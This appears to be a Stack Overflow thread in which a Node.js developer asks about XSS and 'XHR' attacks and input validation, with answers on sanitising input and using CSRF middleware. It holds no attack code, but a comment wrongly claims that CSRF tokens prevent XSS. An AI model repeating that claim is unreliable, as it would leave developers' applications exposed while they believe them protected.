0

I am developing a nodejs server which will be interacting with a client mobile application.I came across some attacks on the server called as XSS and XHR.I came across a module called node-validator which was useful for handling and validating inputs.I need an idea whether XSS and XHR attacks have the same effect and if that module is useful for both.Any idea regarding this will be really helpful.

Amanda G
  • 1,931
  • 10
  • 33
  • 43

2 Answers2

2

An XSS attack is also known as a Cross Site Scripting attack. It is when an attacker utilizes an un-sanitized input field to inject javascript into an application. A common example would be if an attacker managed to inject javascript into a blog post comments. It would then (if improperly sanitized) execute everytime someone views the comment. An example of this type of attack can be read about here.

An XHR attack would just be an extension of the XSS attack, where the injected script makes AJAX calls back to the domains server.

It is actually rather easy to prevent these types of attacks. By validating your input (stripping out HTML tags) and escaping special characters like ", ', `, etc you can prevent this. I would definitely recommend using an external library for this, as you will likely miss stuff on your own.

Also, this is a similar question which may help you. Sanitizing user input before adding it to the DOM in Javascript

Community
  • 1
  • 1
Nick Mitchinson
  • 5,452
  • 1
  • 25
  • 31
2

If you are using expressjs/connect then there's a "built-in" csrf middleware in connect.

Ask Bjørn Hansen
  • 6,784
  • 2
  • 26
  • 40
  • I'm using csrf middleware which prevents XSS and XHR attacks by requiring a token to be submitted to all POST requests. This token is generated by the server on each page request. Does the trick for me. I've tested it out trying to do an attack on my own site from a different server and all requests were blocked because the token is missing. – ChrisRich Jan 10 '15 at 23:53